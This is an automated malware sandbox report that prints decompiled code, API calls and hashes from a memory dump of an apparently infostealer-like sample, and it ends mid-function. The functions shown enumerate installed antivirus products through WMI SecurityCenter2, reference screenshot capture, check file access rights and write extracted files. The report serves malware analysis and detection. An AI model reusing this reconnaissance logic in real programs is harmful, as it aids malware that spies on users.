Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Object$Window$DeleteGlobalSelect$CloseDesktopRectSize_memset
String ID: \screenshot.jpg$image/jpeg
API String ID: 3331076498-508856279
Opcode ID: 613b3b80619bb9cf371b69a3d732131e586ee4e666878106500bab0fdbfe6565
Instruction ID: 06aed9e14a4c638d709ca6c8ecd94982a6c0340b99a4adb417d7955cf2b940a5
Opcode Fuzzy Hash: 613b3b80619bb9cf371b69a3d732131e586ee4e666878106500bab0fdbfe6565
Instruction Fuzzy Hash: B051DCB5A00218AFDB14EFE5EC49EAFB7BCEF89701F104119F501A3251E7B49905CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041F6C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163
comCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0041F6C0() {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v32;
				char _v36;
				char _v52;
				char _v80;
				char _v108;
				char _v109;
				void* _v116;
				char _v120;
				void* _v124;
				void* _v128;
				void* _v132;
				intOrPtr _v140;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				signed int _t49;
				intOrPtr* _t52;
				void* _t54;
				char* _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t63;
				char* _t67;
				void* _t72;
				void* _t74;
				intOrPtr _t93;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				char* _t101;
				signed int _t102;
				void* _t103;

				_t48 =  *0x451f00; // 0xc21d6f0a
				_t49 = _t48 ^ _t102;
				_v24 = _t49;
				 *[fs:0x0] =  &_v16;
				_v20 = _t103 - 0x84;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t49, _t97, _t99, _t72,  *[fs:0x0], E0043F4DB, 0xffffffff);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0); // executed
				_v128 = 0;
				__imp__CoCreateInstance(0x4477bc, 0, 1, 0x4476ec,  &_v128);
				_t52 = _v128;
				_t92 =  &_v116;
				_v116 = 0;
				_t54 =  *((intOrPtr*)( *((intOrPtr*)( *_t52 + 0xc))))(_t52, L"root\\SecurityCenter2", 0, 0, 0, 0, 0, 0,  &_v116); // executed
				if(_t54 < 0) {
					L10:
					_t55 = "Unknown";
					L11:
					 *[fs:0x0] = _v16;
					_pop(_t98);
					_pop(_t100);
					_pop(_t74);
					return E0042A36A(_t55, _t74, _v24 ^ _t102, _t92, _t98, _t100);
				}
				__imp__CoSetProxyBlanket(_v116, 0xa, 0, 0, 3, 3, 0, 0); // executed
				_t57 = _v116;
				_push( &_v124);
				_push(0);
				_push(0x20);
				_push(L"Select * From AntiVirusProduct");
				_v124 = 0;
				_t93 =  *_t57;
				_t92 =  *((intOrPtr*)(_t93 + 0x50));
				_push(L"WQL");
				_push(_t57);
				if( *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x50))))() < 0) {
					goto L10;
				}
				_v132 = 0;
				_v120 = 0;
				_v32 = 0xf;
				_v36 = 0;
				_v52 = 0;
				_t59 = _v124;
				_v8 = 1;
				if(_t59 == 0) {
					goto L10;
				}
				_t92 =  &_v132;
				 *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0x10))))(_t59, 0xffffffff, 1,  &_v132,  &_v120);
				if(_v120 == 0) {
					if(_v32 >= 0x10) {
						_push(_v52);
						E0042A289();
					}
					goto L10;
				}
				__imp__#8( &_v148);
				_t63 = _v132;
				_v8 = 2;
				 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 0x10))))(_t63, L"displayName", 0,  &_v148, 0, 0);
				E0041F440( &_v80, _v140);
				_t92 =  &_v108;
				_v8 = 3;
				_t67 = E004238C0( &_v109,  &_v108,  &_v80);
				if(_t67[0x14] < 0x10) {
					_t101 = _t67;
				} else {
					_t101 =  *_t67;
				}
				E0040A450( &_v108);
				E0040A480( &_v80);
				__imp__#9( &_v148);
				E0040A450( &_v52);
				_t55 = _t101;
				goto L11;
			}

0x0041f6d7
0x0041f6dc
0x0041f6de
0x0041f6e8
0x0041f6ee
0x0041f6f5
0x0041f6f8
0x0041f709
0x0041f720
0x0041f723
0x0041f729
0x0041f72c
0x0041f736
0x0041f744
0x0041f748
0x0041f85d
0x0041f85d
0x0041f862
0x0041f865
0x0041f86d
0x0041f86e
0x0041f86f
0x0041f87d
0x0041f87d
0x0041f75c
0x0041f762
0x0041f768
0x0041f769
0x0041f76a
0x0041f76c
0x0041f771
0x0041f774
0x0041f776
0x0041f779
0x0041f77e
0x0041f783
0x00000000
0x00000000
0x0041f789
0x0041f78c
0x0041f78f
0x0041f796
0x0041f799
0x0041f79c
0x0041f79f
0x0041f7a5
0x00000000
0x00000000
0x0041f7b1
0x0041f7bd
0x0041f7c2
0x0041f84f
0x0041f854
0x0041f855
0x0041f85a
0x00000000
0x0041f84f
0x0041f7cf
0x0041f7d5
0x0041f7ed
0x0041f7f1
0x0041f7fd
0x0041f806
0x0041f80d
0x0041f811
0x0041f81a
0x0041f820
0x0041f81c
0x0041f81c
0x0041f81c
0x0041f825
0x0041f82d
0x0041f839
0x0041f842
0x0041f847
0x00000000

APIs

CoInitializeEx.OLE32(00000000,00000000,C21D6F0A,?,00000010,?), ref: 0041F6F8
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000010,?), ref: 0041F709
CoCreateInstance.OLE32(004477BC,00000000,00000001,004476EC,?,?,00000010,?), ref: 0041F723
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000010,?), ref: 0041F75C
VariantInit.OLEAUT32(?), ref: 0041F7CF

Part of subcall function 0041F440: _wcslen.LIBCMT ref: 0041F45E

Part of subcall function 004238C0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000010,00000000,?,?,0041F816,?,?), ref: 004238F2
Part of subcall function 004238C0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0042391C
Part of subcall function 004238C0: _strlen.LIBCMT ref: 00423937

VariantClear.OLEAUT32(?), ref: 0041F839

Strings

displayName, xrefs: 0041F7E7
WQL, xrefs: 0041F779
root\SecurityCenter2, xrefs: 0041F73B
Select * From AntiVirusProduct, xrefs: 0041F76C
Unknown, xrefs: 0041F85D

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: ByteCharInitializeMultiVariantWide$BlanketClearCreateInitInstanceProxySecurity_strlen_wcslen
String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 1384601803-2561087649
Opcode ID: 5b7f4231c84886d24b1fc7a24887fd438042367031ca2dfb4c426eaf19d54e00
Instruction ID: 8cbc3c8302aa4e8fb02c91fbd18e04d0fd6db1f0c2111b4ad6cc874a8664b669
Opcode Fuzzy Hash: 5b7f4231c84886d24b1fc7a24887fd438042367031ca2dfb4c426eaf19d54e00
Instruction Fuzzy Hash: DC516BB1A00208AFEB14DFA4CC84EAEB77CFB09708F20416EF515A7291D7756E45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00409D50 Relevance: 18.1, APIs: 12, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00409D50(CHAR* _a4, long _a8) {
				signed int _v8;
				struct _GENERIC_MAPPING _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				struct _PRIVILEGE_SET _v44;
				signed char _v45;
				void* _v52;
				long _v56;
				void* _v60;
				int _v64;
				long _v68;
				long _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				int _t46;
				int _t51;
				void* _t65;
				long _t66;
				CHAR* _t78;
				void* _t79;
				struct _SECURITY_DESCRIPTOR* _t80;
				signed int _t81;

				_t43 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t43 ^ _t81;
				_t78 = _a4;
				_v45 = 0;
				_v56 = 0;
				_t46 = GetFileSecurityA(_t78, 7, 0, 0,  &_v56); // executed
				if(_t46 == 0 && GetLastError() == 0x7a) {
					_push(_t65);
					_t66 = _v56;
					_push(_t79);
					_t80 = E0042BDF8(_t74, _t78, _t79, _t66);
					if(_t80 != 0) {
						_t51 = GetFileSecurityA(_t78, 7, _t80, _t66,  &_v56); // executed
						if(_t51 != 0) {
							_t74 =  &_v60;
							_t78 = 0;
							_v60 = 0;
							if(OpenProcessToken(GetCurrentProcess(), 0x2000e,  &_v60) != 0) {
								_v52 = 0;
								if(DuplicateToken(_v60, 2,  &_v52) != 0) {
									_v24.GenericWrite = 0;
									_v24.GenericExecute = 0;
									_v24.GenericAll = 0;
									_v44.Control = 0;
									_v44.Privilege = 0;
									_v32 = 0;
									_v28 = 0;
									_v44.PrivilegeCount = 0;
									_v68 = 0;
									_v72 = 0x14;
									_v64 = 0;
									_v24.GenericRead = 0x120089;
									_v24.GenericWrite = 0x120116;
									_v24.GenericExecute = 0x1200a0;
									_v24.GenericAll = 0x1f01ff;
									MapGenericMask( &_a8,  &_v24);
									if(AccessCheck(_t80, _v52, _a8,  &_v24,  &_v44,  &_v72,  &_v68,  &_v64) != 0) {
										_v45 = _v64 == 1;
									}
									_t74 = _v52;
									CloseHandle(_v52);
								}
								CloseHandle(_v60);
							}
							E0042BE8C(_t80);
						}
					}
					_pop(_t79);
					_pop(_t65);
				}
				return E0042A36A(_v45 & 0x000000ff, _t65, _v8 ^ _t81, _t74, _t78, _t79);
			}

0x00409d56
0x00409d5d
0x00409d61
0x00409d6f
0x00409d73
0x00409d7a
0x00409d82
0x00409d97
0x00409d98
0x00409d9b
0x00409da2
0x00409da9
0x00409db8
0x00409dc0
0x00409dc6
0x00409dca
0x00409dd1
0x00409de3
0x00409df3
0x00409dfe
0x00409e06
0x00409e09
0x00409e0c
0x00409e12
0x00409e15
0x00409e18
0x00409e1b
0x00409e23
0x00409e26
0x00409e29
0x00409e30
0x00409e33
0x00409e3a
0x00409e41
0x00409e48
0x00409e4f
0x00409e7a
0x00409e80
0x00409e80
0x00409e84
0x00409e88
0x00409e88
0x00409e92
0x00409e92
0x00409e99
0x00409e9e
0x00409dc0
0x00409ea1
0x00409ea2
0x00409ea2
0x00409eb5

APIs

GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 00409D7A
GetLastError.KERNEL32 ref: 00409D88
_malloc.LIBCMT ref: 00409D9D

Part of subcall function 0042BDF8: __FF_MSGBANNER.LIBCMT ref: 0042BE11
Part of subcall function 0042BDF8: __NMSG_WRITE.LIBCMT ref: 0042BE18
Part of subcall function 0042BDF8: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,0042C560,?), ref: 0042BE3D

GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,00000000), ref: 00409DB8
GetCurrentProcess.KERNEL32(0002000E,?), ref: 00409DD4
OpenProcessToken.ADVAPI32(00000000), ref: 00409DDB
DuplicateToken.ADVAPI32(?,00000002,?), ref: 00409DF6
MapGenericMask.ADVAPI32(?,?), ref: 00409E4F
AccessCheck.ADVAPI32(00000000,?,001200A0,00120089,?,00000014,?,?), ref: 00409E72
CloseHandle.KERNEL32(?), ref: 00409E88
CloseHandle.KERNEL32(?), ref: 00409E92
_free.LIBCMT ref: 00409E99

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: CloseFileHandleProcessSecurityToken$AccessAllocateCheckCurrentDuplicateErrorGenericHeapLastMaskOpen_free_malloc
String ID:
API String ID: 1304225167-0
Opcode ID: e26963218cd56e98491f94cfc6b73f98c1245b78bb80ccf1df98a6073911495c
Instruction ID: 0352416851a5a8c002130522a6738f506d739776847bdcec6d6aa70ef993868e
Opcode Fuzzy Hash: e26963218cd56e98491f94cfc6b73f98c1245b78bb80ccf1df98a6073911495c
Instruction Fuzzy Hash: 42411AB1D00259AFDF00DFA5E844AEEBBB8EF49701F10412AF505B6291E7749A05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00409070 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 344
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00409070(signed int* __ecx, void* __edx, void* _a4, signed int _a8, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v267;
				char _v268;
				char _v528;
				struct _FILETIME _v544;
				struct _FILETIME _v552;
				struct _FILETIME _v560;
				unsigned int _v564;
				char _v828;
				char _v829;
				signed int _v836;
				long _v840;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t85;
				intOrPtr _t87;
				signed int _t101;
				signed int _t106;
				signed int _t110;
				signed char _t113;
				signed int _t124;
				void* _t125;
				signed int _t128;
				signed int _t130;
				intOrPtr _t138;
				signed int _t140;
				signed int _t142;
				signed int _t145;
				signed int _t146;
				void* _t147;
				signed int _t158;
				void* _t168;
				signed int _t172;
				void* _t177;
				signed int _t181;
				signed int* _t190;
				void* _t191;
				long _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;
				void* _t199;
				void* _t201;

				_t177 = __edx;
				_t85 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t85 ^ _t195;
				_t145 = _a8;
				_t191 = _a16;
				_t190 = __ecx;
				_v836 = _t145;
				if(_t191 == 3) {
					_t87 =  *((intOrPtr*)(__ecx + 4));
					_t191 = _a4;
					__eflags = _t191 - _t87;
					if(_t191 == _t87) {
						L13:
						_t149 = _a12;
						_t178 =  *_t190;
						_t191 = E00408D30( *_t190, _t145, _a12,  &_v829);
						__eflags = _t191;
						if(_t191 <= 0) {
							E00406D80(_t149,  *_t190);
							_t190[1] = 0xffffffff;
						}
						__eflags = _v829;
						if(_v829 == 0) {
							__eflags = _t191;
							if(_t191 <= 0) {
								_t21 = _t191 + 0x6a; // 0x6a
								asm("sbb eax, eax");
								__eflags = _v8 ^ _t195;
								return E0042A36A(( ~_t21 & 0x04fff000) + 0x1000, _t145, _v8 ^ _t195, _t178, _t190, _t191);
							} else {
								__eflags = _v8 ^ _t195;
								return E0042A36A(0x600, _t145, _v8 ^ _t195, _t178, _t190, _t191);
							}
						} else {
							goto L16;
						}
					} else {
						__eflags = _t87 - 0xffffffff;
						if(_t87 != 0xffffffff) {
							E00406D80(__ecx,  *((intOrPtr*)(__ecx)));
							_t196 = _t196 + 4;
						}
						_t101 =  *_t190;
						_t190[1] = 0xffffffff;
						__eflags = _t191 -  *((intOrPtr*)(_t101 + 4));
						if(_t191 >=  *((intOrPtr*)(_t101 + 4))) {
							goto L3;
						} else {
							__eflags = _t191 -  *((intOrPtr*)(_t101 + 0x10));
							if(_t191 <  *((intOrPtr*)(_t101 + 0x10))) {
								E004069D0(_t101);
								_t196 = _t196 + 4;
							}
							_t158 =  *_t190;
							__eflags =  *((intOrPtr*)(_t158 + 0x10)) - _t191;
							if( *((intOrPtr*)(_t158 + 0x10)) < _t191) {
								do {
									E00406A20( *_t190);
									_t106 =  *_t190;
									_t196 = _t196 + 4;
									__eflags =  *((intOrPtr*)(_t106 + 0x10)) - _t191;
								} while ( *((intOrPtr*)(_t106 + 0x10)) < _t191);
							}
							E00408BB0(_t190[0x4e],  *_t190, _t190[0x4e]); // executed
							_t196 = _t196 + 8;
							_t190[1] = _t191;
							goto L13;
						}
					}
				} else {
					if(_t191 == 2 || _t191 == 1) {
						_t146 = _t145 | 0xffffffff;
						__eflags = _t190[1] - _t146;
						if(_t190[1] != _t146) {
							E00406D80( *_t190,  *_t190);
							_t196 = _t196 + 4;
						}
						_t110 =  *_t190;
						_t190[1] = _t146;
						_t145 = _a4;
						__eflags = _t145 -  *((intOrPtr*)(_t110 + 4));
						if(_t145 >=  *((intOrPtr*)(_t110 + 4))) {
							goto L3;
						} else {
							__eflags = _t145 -  *((intOrPtr*)(_t110 + 0x10));
							if(_t145 <  *((intOrPtr*)(_t110 + 0x10))) {
								E004069D0(_t110);
								_t196 = _t196 + 4;
							}
							_t181 =  *_t190;
							__eflags =  *((intOrPtr*)(_t181 + 0x10)) - _t145;
							if( *((intOrPtr*)(_t181 + 0x10)) < _t145) {
								do {
									_t194 =  *_t190;
									__eflags = _t194;
									if(_t194 != 0) {
										__eflags =  *(_t194 + 0x18);
										if( *(_t194 + 0x18) != 0) {
											_t138 =  *((intOrPtr*)(_t194 + 0x10)) + 1;
											__eflags = _t138 -  *((intOrPtr*)(_t194 + 4));
											if(_t138 !=  *((intOrPtr*)(_t194 + 4))) {
												 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) +  *((intOrPtr*)(_t194 + 0x50)) +  *((intOrPtr*)(_t194 + 0x4c)) +  *((intOrPtr*)(_t194 + 0x48)) + 0x2e;
												 *((intOrPtr*)(_t194 + 0x10)) = _t138;
												_t140 = E00406650(_t194, _t194 + 0x28, _t194 + 0x78, 0, 0, 0, 0, 0, 0);
												_t196 = _t196 + 0x24;
												asm("sbb eax, eax");
												_t142 =  ~_t140 + 1;
												__eflags = _t142;
												 *(_t194 + 0x18) = _t142;
											}
										}
									}
									_t172 =  *_t190;
									__eflags =  *((intOrPtr*)(_t172 + 0x10)) - _t145;
								} while ( *((intOrPtr*)(_t172 + 0x10)) < _t145);
								_t191 = _a16;
							}
							_t178 =  &_v828;
							E00406E10(_t190,  &_v828, _t145,  &_v828);
							_t113 = _v564 >> 4;
							__eflags = _t113 & 0x00000001;
							if((_t113 & 0x00000001) != 0) {
								L16:
								__eflags = _v8 ^ _t195;
								return E0042A36A(0, _t145, _v8 ^ _t195, _t178, _t190, _t191);
							} else {
								_t147 = _v836;
								_v528 = 0;
								__eflags = _t191 - 1;
								if(_t191 != 1) {
									_t128 =  *_t147;
									_t191 = _t147;
									_t168 = _t147;
									__eflags = _t128;
									while(_t128 != 0) {
										__eflags = _t128 - 0x2f;
										if(_t128 == 0x2f) {
											L38:
											_t191 = _t168 + 1;
										} else {
											__eflags = _t128 - 0x5c;
											if(_t128 == 0x5c) {
												goto L38;
											}
										}
										_t128 =  *(_t168 + 1);
										_t168 = _t168 + 1;
										__eflags = _t128;
									}
									E0042CB4B( &_v268, _t147, 0x104);
									_t201 = _t196 + 0xc;
									__eflags = _t191 - _t147;
									if(_t191 != _t147) {
										 *((char*)(_t195 + _t191 - _t147 - 0x108)) = 0;
										_t130 = _v268;
										__eflags = _t130 - 0x2f;
										if(_t130 == 0x2f) {
											L50:
											wsprintfA( &_v528, "%s%s",  &_v268, _t191);
											_t196 = _t201 + 0x10;
											goto L43;
										} else {
											__eflags = _t130 - 0x5c;
											if(_t130 == 0x5c) {
												goto L50;
											} else {
												__eflags = _t130;
												if(_t130 == 0) {
													goto L42;
												} else {
													__eflags = _v267 - 0x3a;
													if(_v267 != 0x3a) {
														goto L42;
													} else {
														goto L50;
													}
												}
											}
										}
										goto L68;
									} else {
										_v268 = 0;
										L42:
										wsprintfA( &_v528, "%s%s%s",  &(_t190[0x50]),  &_v268, _t191);
										_t196 = _t201 + 0x14;
									}
									L43:
									_t178 = _v564;
									_t147 = CreateFileA( &_v528, 0x40000000, 0, 0, 2, _v564, 0);
								}
								__eflags = _t147 - 0xffffffff;
								if(_t147 != 0xffffffff) {
									E00408BB0(_t190[0x4e],  *_t190, _t190[0x4e]);
									_t199 = _t196 + 8;
									__eflags = _t190[0x4f];
									if(__eflags == 0) {
										_push(0x4000);
										_t125 = E0042976C(_t190, _t191, __eflags);
										_t199 = _t199 + 4;
										_t190[0x4f] = _t125;
									}
									_v836 = 0;
									while(1) {
										_t162 = _t190[0x4f];
										_t192 = E00408D30( *_t190, _t190[0x4f], 0x4000,  &_v829);
										_t199 = _t199 + 0x10;
										__eflags = _t192 - 0xffffff96;
										if(_t192 == 0xffffff96) {
											break;
										}
										__eflags = _t192;
										if(__eflags < 0) {
											L60:
											_v836 = 0x5000000;
										} else {
											if(__eflags <= 0) {
												L58:
												__eflags = _v829;
												if(_v829 == 0) {
													__eflags = _t192;
													if(_t192 != 0) {
														continue;
													} else {
														goto L60;
													}
												}
											} else {
												_t162 = _t190[0x4f];
												_t124 = WriteFile(_t147, _t190[0x4f], _t192,  &_v840, 0);
												__eflags = _t124;
												if(_t124 == 0) {
													_v836 = 0x400;
												} else {
													goto L58;
												}
											}
										}
										L61:
										_t184 =  *_t190;
										E00406D80(_t162,  *_t190);
										_t193 = _v836;
										__eflags = _t193;
										if(_t193 == 0) {
											_t184 =  &_v552;
											SetFileTime(_t147,  &_v552,  &_v560,  &_v544);
										}
										__eflags = _a16 - 1;
										if(_a16 != 1) {
											CloseHandle(_t147);
										}
										__eflags = _v8 ^ _t195;
										return E0042A36A(_t193, _t147, _v8 ^ _t195, _t184, _t190, _t193);
										goto L68;
									}
									_v836 = 0x1000;
									goto L61;
								} else {
									__eflags = _v8 ^ _t195;
									return E0042A36A(0x200, _t147, _v8 ^ _t195, _t178, _t190, _t191);
								}
							}
						}
					} else {
						L3:
						return E0042A36A(0x10000, _t145, _v8 ^ _t195, _t177, _t190, _t191);
					}
				}
				L68:
			}

0x00409070
0x00409079
0x00409080
0x00409084
0x00409088
0x0040908c
0x0040908e
0x00409097
0x004090c3
0x004090c6
0x004090c9
0x004090cb
0x00409127
0x00409127
0x0040912a
0x0040913b
0x00409140
0x00409142
0x00409147
0x0040914f
0x0040914f
0x00409156
0x0040915d
0x00409174
0x00409176
0x00409190
0x00409195
0x004091a7
0x004091b1
0x0040917a
0x00409183
0x0040918d
0x0040918d
0x00000000
0x00000000
0x00000000
0x004090cd
0x004090cd
0x004090d0
0x004090d5
0x004090da
0x004090da
0x004090dd
0x004090df
0x004090e6
0x004090e9
0x00000000
0x004090eb
0x004090eb
0x004090ee
0x004090f1
0x004090f6
0x004090f6
0x004090f9
0x004090fb
0x004090fe
0x00409100
0x00409103
0x00409108
0x0040910a
0x0040910d
0x0040910d
0x00409100
0x0040911c
0x00409121
0x00409124
0x00000000
0x00409124
0x004090e9
0x00409099
0x0040909c
0x004091b4
0x004091b7
0x004091ba
0x004091bf
0x004091c4
0x004091c4
0x004091c7
0x004091c9
0x004091cc
0x004091cf
0x004091d2
0x00000000
0x004091d8
0x004091d8
0x004091db
0x004091de
0x004091e3
0x004091e3
0x004091e6
0x004091e8
0x004091eb
0x004091f0
0x004091f0
0x004091f2
0x004091f4
0x004091f6
0x004091fa
0x004091ff
0x00409200
0x00409203
0x0040921c
0x00409224
0x0040922d
0x00409232
0x00409237
0x00409239
0x00409239
0x0040923a
0x0040923a
0x00409203
0x004091fa
0x0040923d
0x0040923f
0x0040923f
0x00409244
0x00409244
0x00409247
0x00409251
0x0040925c
0x0040925f
0x00409261
0x00409161
0x00409167
0x00409171
0x00409267
0x00409267
0x0040926d
0x00409274
0x00409277
0x0040927d
0x0040927f
0x00409281
0x00409283
0x00409285
0x00409287
0x00409289
0x0040928f
0x0040928f
0x0040928b
0x0040928b
0x0040928d
0x00000000
0x00000000
0x0040928d
0x00409292
0x00409295
0x00409296
0x00409296
0x004092a7
0x004092ac
0x004092af
0x004092b1
0x00409322
0x0040932a
0x00409330
0x00409332
0x0040934d
0x00409361
0x00409367
0x00000000
0x00409334
0x00409334
0x00409336
0x00000000
0x00409338
0x00409338
0x0040933a
0x00000000
0x00409340
0x00409340
0x00409347
0x00000000
0x00000000
0x00000000
0x00000000
0x00409347
0x0040933a
0x00409336
0x00000000
0x004092b3
0x004092b3
0x004092ba
0x004092d5
0x004092db
0x004092db
0x004092de
0x004092de
0x004092ff
0x004092ff
0x00409301
0x00409304
0x00409379
0x0040937e
0x00409381
0x00409388
0x0040938a
0x0040938f
0x00409394
0x00409397
0x00409397
0x0040939d
0x004093b0
0x004093b0
0x004093cb
0x004093cd
0x004093d0
0x004093d3
0x00000000
0x00000000
0x004093d9
0x004093db
0x00409408
0x00409408
0x004093dd
0x004093dd
0x004093fb
0x004093fb
0x00409402
0x00409404
0x00409406
0x00000000
0x00000000
0x00000000
0x00000000
0x00409406
0x004093df
0x004093df
0x004093f1
0x004093f7
0x004093f9
0x00409471
0x00000000
0x00000000
0x00000000
0x004093f9
0x004093dd
0x00409412
0x00409412
0x00409415
0x0040941a
0x00409423
0x00409425
0x00409435
0x0040943d
0x0040943d
0x00409443
0x00409447
0x0040944a
0x0040944a
0x00409457
0x00409462
0x00000000
0x00409462
0x00409465
0x00000000
0x00409308
0x00409311
0x0040931b
0x0040931b
0x00409304
0x00409261
0x004090ad
0x004090ad
0x004090c0
0x004090c0
0x0040909c
0x00000000

APIs

__fassign.LIBCMT ref: 004092A7
wsprintfA.USER32 ref: 004092D5
CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000), ref: 004092F9

Strings

:, xrefs: 00409340
%s%s%s, xrefs: 004092CF
%s%s, xrefs: 0040935B

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: CreateFile__fassignwsprintf
String ID: %s%s$%s%s%s$:
API String ID: 3658515636-3034790606
Opcode ID: e985a47812597238b8836813ef869ac39452db78c5e1becf9ef43297f60aace6
Instruction ID: 5d1005d9f350100405cee66f565f02674385c03f23045a03524c321b915b4fcd
Opcode Fuzzy Hash: e985a47812597238b8836813ef869ac39452db78c5e1becf9ef43297f60aace6
Instruction Fuzzy Hash: F2C12971A002149BDB24DF14D884BABB374BF44304F1442BFE95A6B3C2D778AE95CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041D5F0 Relevance: 17.0, APIs: 11, Instructions: 459
stringCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041D5F0(intOrPtr __ecx, void* __eflags) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v1020;
				char _v2020;
				char _v2028;
				short _v2032;
				void* _v2036;
				char _v2048;
				intOrPtr _v2056;
				short _v2060;
				char _v2076;
				intOrPtr _v2084;
				short _v2088;
				char _v2104;
				intOrPtr _v2112;
				short _v2116;
				char _v2132;
				intOrPtr _v2140;
				short _v2144;
				char _v2160;
				intOrPtr _v2168;
				short _v2172;
				char _v2188;
				intOrPtr _v2196;
				char _v2216;
				char _v2217;
				intOrPtr _v2224;
				char _v2228;
				short _v2232;
				short _v2236;
				void* _v2240;
				intOrPtr _v2244;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t175;
				signed int _t176;
				intOrPtr _t186;
				void* _t190;
				void* _t195;
				short _t199;
				void* _t201;
				intOrPtr* _t203;
				intOrPtr _t205;
				void* _t211;
				void* _t213;
				void* _t216;
				intOrPtr* _t217;
				void* _t238;
				void* _t240;
				void* _t243;
				intOrPtr* _t245;
				void* _t255;
				void* _t257;
				char _t267;
				intOrPtr _t279;
				intOrPtr _t282;
				intOrPtr _t301;
				intOrPtr _t302;
				intOrPtr _t311;
				intOrPtr _t313;
				void* _t317;
				intOrPtr _t319;
				short* _t320;
				void* _t321;
				intOrPtr _t322;
				intOrPtr _t323;
				void* _t324;
				char* _t326;
				char* _t327;
				intOrPtr* _t328;
				short* _t329;
				short* _t330;
				void* _t331;
				intOrPtr* _t333;
				intOrPtr* _t336;
				signed int _t338;
				void* _t339;
				char* _t344;
				void* _t345;
				char* _t346;
				void* _t347;
				void* _t350;
				void* _t352;
				void* _t353;

				_t353 = __eflags;
				_t175 =  *0x451f00; // 0xc21d6f0a
				_t176 = _t175 ^ _t338;
				_v20 = _t176;
				 *[fs:0x0] =  &_v16;
				_v2244 = __ecx;
				_t325 = E00420650(_t255, _t317, _t324, 0x1a);
				_v2168 = 0xf;
				_v2172 = 0;
				_v2188 = 0;
				E00404BC0( &_v2188, _t178, E0042BC70(_t178));
				_v8 = 0;
				E0042A2F0( &_v1020, 0, 0x3e8);
				E0042A2F0( &_v2020, 0, 0x3e8);
				 *0x464860( &_v1020, E00420650(0, 0xf, _t325, 0x1a), _t176, _t317, _t324, _t255,  *[fs:0x0], E0043F375, 0xffffffff);
				_t186 =  *0x453748; // 0x25c6b88
				 *0x464860( &_v1020, _t186);
				_t301 =  *0x453404; // 0x25c9ce8
				 *0x464860( &_v1020, _t301);
				_t190 = E00420650(0, 0xf, _t325, 0x1a);
				 *0x464860();
				_t302 =  *0x4538dc; // 0x25c8458
				 *0x464860();
				 *0x464860();
				_t344 = _t339 - 0x8b4 + 0x28 - 0x1c;
				_t326 = _t344;
				_v2224 = _t344;
				 *((intOrPtr*)(_t326 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t326 + 0x10)) = 0;
				 *_t326 = 0;
				_t195 = E0042BC70( &_v1020);
				_t345 = _t344 + 4;
				E00404BC0(_t326,  &_v1020, _t195);
				E00424100( &_v2217, _t353,  &_v2240,  &_v2020, 0x4465b0,  &_v2020, _t302,  &_v2020, _t190); // executed
				_t199 = _v2236;
				_t267 = _v2240;
				_v8 = 1;
				_v2224 = _t199;
